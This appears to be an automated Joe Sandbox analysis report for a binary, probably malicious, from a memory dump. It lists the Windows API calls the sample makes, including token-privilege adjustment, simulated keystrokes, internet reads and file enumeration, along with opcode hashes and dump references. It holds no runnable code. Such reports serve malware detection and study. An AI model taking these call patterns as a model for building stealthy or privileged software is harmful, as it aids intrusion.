                                                                        • Instruction ID: 9039ca7c987882995549ad6cadc10368857ccf0c9061f4206878ef357de94a31
                                                                        • Opcode Fuzzy Hash: 0cd2a0b9ceeea71f6111acb847ff007d291c590edf1a34d1c56a950f69cdb204
                                                                        • Instruction Fuzzy Hash: D641AE71600204AFEB14AF688886F7F77EDEF84724F148548F956AB3D2DB749D018B91
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0093EB8A
                                                                        • _wcscmp.LIBCMT ref: 0093EBBA
                                                                        • _wcscmp.LIBCMT ref: 0093EBCF
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0093EBE0
                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0093EC0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 2387731787-0
                                                                        • Opcode ID: 2670b9f3661d20594cf783c680df059278d12e0369e816d5866bc5103b8546f0
                                                                        • Instruction ID: 5cea1dc0079a3c171bedf351bfce24bb6d1c65f561fb864752c1a23725dd4725
                                                                        • Opcode Fuzzy Hash: 2670b9f3661d20594cf783c680df059278d12e0369e816d5866bc5103b8546f0
                                                                        • Instruction Fuzzy Hash: 6941AC35604602DFD718DF28C491AAAB3E8FF89324F10455DF99A8B3E1DB35A984CF91
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                        • String ID:
                                                                        • API String ID: 292994002-0
                                                                        • Opcode ID: b207f42ec609aabd349c71224f37a1e6524b5ef45605078d0e462f5143b4bd24
                                                                        • Instruction ID: b254e9080dbe1751c31c06512711b559205ddd2738bacd1bb45fed3b936d5d38
                                                                        • Opcode Fuzzy Hash: b207f42ec609aabd349c71224f37a1e6524b5ef45605078d0e462f5143b4bd24
                                                                        • Instruction Fuzzy Hash: 6711B2323099256FE7219F27DC44B6F77ADEF84762F040429F849E7281CF30994687A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                        • API String ID: 0-1546025612
                                                                        • Opcode ID: 45e67831ad3e356bdd673840fc737bcaa2faeec06a71b0cf22acb51bddec6d29
                                                                        • Instruction ID: 8478407bd24e40e2745c7db24a21fb8ad248cc70c7c237d861eca255f7a8a0c5
                                                                        • Opcode Fuzzy Hash: 45e67831ad3e356bdd673840fc737bcaa2faeec06a71b0cf22acb51bddec6d29
                                                                        • Instruction Fuzzy Hash: 52926CB2A0021ECBDF28CF68C8407BDB7B5FB54314F25819AE95AE7280D7759D81CB91
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0090E014,774D0AE0,0090DEF1,0098DC38,?,?), ref: 0090E02C
                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0090E03E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                        • API String ID: 2574300362-192647395
                                                                        • Opcode ID: a68d3f956bc5451409357dd54bf5a173f1c2887d40b6839dd9133fe098a0fef3
                                                                        • Instruction ID: 97a5ea589c4b88b958558325cce25fd96584626739e778966fd06e733bf90c8c
                                                                        • Opcode Fuzzy Hash: a68d3f956bc5451409357dd54bf5a173f1c2887d40b6839dd9133fe098a0fef3
                                                                        • Instruction Fuzzy Hash: 15D0A7B141C7129FC7354F64EC0862277F8AF01314F28481AE886D2190D7B4C8C0C790
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009313DC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: ($|
                                                                        • API String ID: 1659193697-1631851259
                                                                        • Opcode ID: c47f36273840cc9ef05ebb6257666482cd50bc4a5f03667a8de81e9422bf12a8
                                                                        • Instruction ID: 85398e1ff2ee99966b0e19be9488777c117d1bacbe73f8058a6713511ea810c5
                                                                        • Opcode Fuzzy Hash: c47f36273840cc9ef05ebb6257666482cd50bc4a5f03667a8de81e9422bf12a8
                                                                        • Instruction Fuzzy Hash: 5F321375A006059FCB28CF69D480A6AB7F0FF48320B15C56EE59ADB3A1E770E981CB44
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 0090B22F
                                                                          • Part of subcall function 0090B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0090B5A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Proc$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 2749884682-0
                                                                        • Opcode ID: 18564f444c2479967747e8ed230609850dc7fe2223e34d951c89a98423e55984
                                                                        • Instruction ID: 849c039c9a060fc7eb15bfb8e59b2a0df30305de9047da9494bfbdc9d434b5c1
                                                                        • Opcode Fuzzy Hash: 18564f444c2479967747e8ed230609850dc7fe2223e34d951c89a98423e55984
                                                                        • Instruction Fuzzy Hash: 02A15870118105FEDB28AB2E4C99EBF3A5CEFA6760B504919F812D61E5DB289C01E372
                                                                        APIs
                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009443BF,00000000), ref: 00944FA6
                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00944FD2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                        • String ID:
                                                                        • API String ID: 599397726-0
                                                                        • Opcode ID: 8c7acb13b414e0802a1938bff4b17e8d0b6d80d6f3ac74538e9ea3036d941f20
                                                                        • Instruction ID: ab3517bc6539f0bcf5d2da0356a8d35840958d4956d3b8189678aa9dc16dba4a
                                                                        • Opcode Fuzzy Hash: 8c7acb13b414e0802a1938bff4b17e8d0b6d80d6f3ac74538e9ea3036d941f20
                                                                        • Instruction Fuzzy Hash: E141E575604609BFEB20DE84DC81FBFB7BCEB80718F10406AF609A6181EA719E45D6A0
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0093E20D
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0093E267
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0093E2B4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID:
                                                                        • API String ID: 1682464887-0
                                                                        • Opcode ID: c1e448106b79b81ddc848bf35e8fab69892263fc71319c4cb8aede5bb6994f90
                                                                        • Instruction ID: 8d357881ce942ebc289009d20b7635ab83f3140d9c56d93778e7160baf7f6445
                                                                        • Opcode Fuzzy Hash: c1e448106b79b81ddc848bf35e8fab69892263fc71319c4cb8aede5bb6994f90
                                                                        • Instruction Fuzzy Hash: 67215C35A10218EFDB00EFA5D885AAEBBB8FF88310F0484A9E945E7291DB319945CB50
                                                                        APIs
                                                                          • Part of subcall function 0090F4EA: std::exception::exception.LIBCMT ref: 0090F51E
                                                                          • Part of subcall function 0090F4EA: __CxxThrowException@8.LIBCMT ref: 0090F533
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0092B180
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0092B1AD
                                                                        • GetLastError.KERNEL32 ref: 0092B1BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1922334811-0
                                                                        • Opcode ID: a5159cc4cff6c66a5798248e538b05b86c4c9831d281550d35d8fae140db70b6
                                                                        • Instruction ID: 3b77d9daf08ab6ffcdff7b0c6d1257333f9f76fa739c86b64086a732fbba26eb
                                                                        • Opcode Fuzzy Hash: a5159cc4cff6c66a5798248e538b05b86c4c9831d281550d35d8fae140db70b6
                                                                        • Instruction Fuzzy Hash: BF11BFB2518205AFE7289F54EC95D2BB7FCEF44710B20852EE45A97251DB70FD418A60
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009366AF
                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009366EC
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009366F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                        • String ID:
                                                                        • API String ID: 33631002-0
                                                                        • Opcode ID: ccdb182f75148cda2ed8bc5017308c7ac85115f2f9f238306ca5a9841a1cb9fd
                                                                        • Instruction ID: 27c487dd53f2f2f05f8ed7a950310c6e75a2b3ec9cba83665b873cc8e84449f9
                                                                        • Opcode Fuzzy Hash: ccdb182f75148cda2ed8bc5017308c7ac85115f2f9f238306ca5a9841a1cb9fd
                                                                        • Instruction Fuzzy Hash: 4B11C8B2915228BFE7108BACDC45FAF77BCEB04758F004655F905E7191C2749E048BE1
                                                                        APIs
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00937223
                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0093723A
                                                                        • FreeSid.ADVAPI32(?), ref: 0093724A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                        • String ID:
                                                                        • API String ID: 3429775523-0
                                                                        • Opcode ID: 8587d0ad48a0dc6b17308261bca3dc2a464fe8ae769dffe9f49fd719af1f2265
                                                                        • Instruction ID: 30223eaa1785c5b2e4fdb3e5f8fe61d54d05523dc4221d097541f216a7b5c959
                                                                        • Opcode Fuzzy Hash: 8587d0ad48a0dc6b17308261bca3dc2a464fe8ae769dffe9f49fd719af1f2265
                                                                        • Instruction Fuzzy Hash: 4BF01776A15209FFDF04DFE4DD89EEEBBBCEF08301F105869A606E2191E2709A449B10
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0093F599
                                                                        • FindClose.KERNEL32(00000000), ref: 0093F5C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: 2403dc69bcc92a5d519bd3f580fbf75df348b8283a90d09bc4f07330ce28f164
                                                                        • Instruction ID: 77fcb1eba09e2d5cba38ae9161548aa577cd785f4fe54ae45125eb94d70b26b8
                                                                        • Opcode Fuzzy Hash: 2403dc69bcc92a5d519bd3f580fbf75df348b8283a90d09bc4f07330ce28f164
                                                                        • Instruction Fuzzy Hash: FB11AD726046009FD700EF28D849A2EB3E8FF84324F00896EF8A9D7291DB30A9048B81
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0094BE6A,?,?,00000000,?), ref: 0093CEA7
                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0094BE6A,?,?,00000000,?), ref: 0093CEB9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFormatLastMessage
                                                                        • String ID:
                                                                        • API String ID: 3479602957-0
                                                                        • Opcode ID: 8704d111d01372df5527dc3b21457e47e728875c58396d0353eea515fd1f122e
                                                                        • Instruction ID: a6f767f403e2445af6bdeb1c61bc240967c949d14416fab5e7e2eca416a8f5f6
                                                                        • Opcode Fuzzy Hash: 8704d111d01372df5527dc3b21457e47e728875c58396d0353eea515fd1f122e
                                                                        • Instruction Fuzzy Hash: 0FF0827111422DABDB209BA4DC49FEA776DFF08365F004165F919E6181D6709A40CBA1
                                                                        APIs
                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00934153
                                                                        • keybd_event.USER32(?,7707C0D0,?,00000000), ref: 00934166
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: InputSendkeybd_event
                                                                        • String ID:
                                                                        • API String ID: 3536248340-0
                                                                        • Opcode ID: 63799fbe67504d851b96343c6a14f0951b09573608176280040f77a8fc6ca413
                                                                        • Instruction ID: 17c96fe9d8b5aaf3d125611326673abd16b37f123af93fb66edc4d69aa31a7e6
                                                                        • Opcode Fuzzy Hash: 63799fbe67504d851b96343c6a14f0951b09573608176280040f77a8fc6ca413
                                                                        • Instruction Fuzzy Hash: 4AF0677181824DAFDB058FA0C805BBE7BB4FF10305F00844AF966AA192D77996529FA0
                                                                        APIs
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0092ACC0), ref: 0092AB99
                                                                        • CloseHandle.KERNEL32(?,?,0092ACC0), ref: 0092ABAB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 81990902-0
                                                                        • Opcode ID: dcdb216e24bfab5e30f976465a5fc49e38ec684f795125c91ca140ffb4002b82
                                                                        • Instruction ID: bf35d86ad299bccd44a46e1d52412220f827bb50921813958deb122e215be120
                                                                        • Opcode Fuzzy Hash: dcdb216e24bfab5e30f976465a5fc49e38ec684f795125c91ca140ffb4002b82
                                                                        • Instruction Fuzzy Hash: D5E0BF72014510AFE7252F54EC15D7677A9EF443207108429B45981871D7625D90DB50
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00916DB3,-0000031A,?,?,00000001), ref: 009181B1
                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009181BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 921e82b8b3d779214a396806e991ac1ed9823ebe11a197769988ad8651cfd1de
                                                                        • Instruction ID: f2ff7049ecb47e53bc590fa5c76aa84d3587d21fe47babdf5dff26f4d4cd37b5
                                                                        • Opcode Fuzzy Hash: 921e82b8b3d779214a396806e991ac1ed9823ebe11a197769988ad8651cfd1de
                                                                        • Instruction Fuzzy Hash: 58B09232059608ABDB002BA1EC09B587FB8EF4866AF004010F60D480619B725590AAA6
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: 2f984c97832215d4ef0c7241236db633dfac46e893c074eec7f98966dca44fa3
                                                                        • Instruction ID: c6c3f007ba9c79850565d9d774a4d930aad2541593ba11e85ae7219673055af2
                                                                        • Opcode Fuzzy Hash: 2f984c97832215d4ef0c7241236db633dfac46e893c074eec7f98966dca44fa3
                                                                        • Instruction Fuzzy Hash: 14A23871A0421DCFDB24CF68C8806ADBBB1FF49314F2581A9E959EB391D7349E81DB90
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
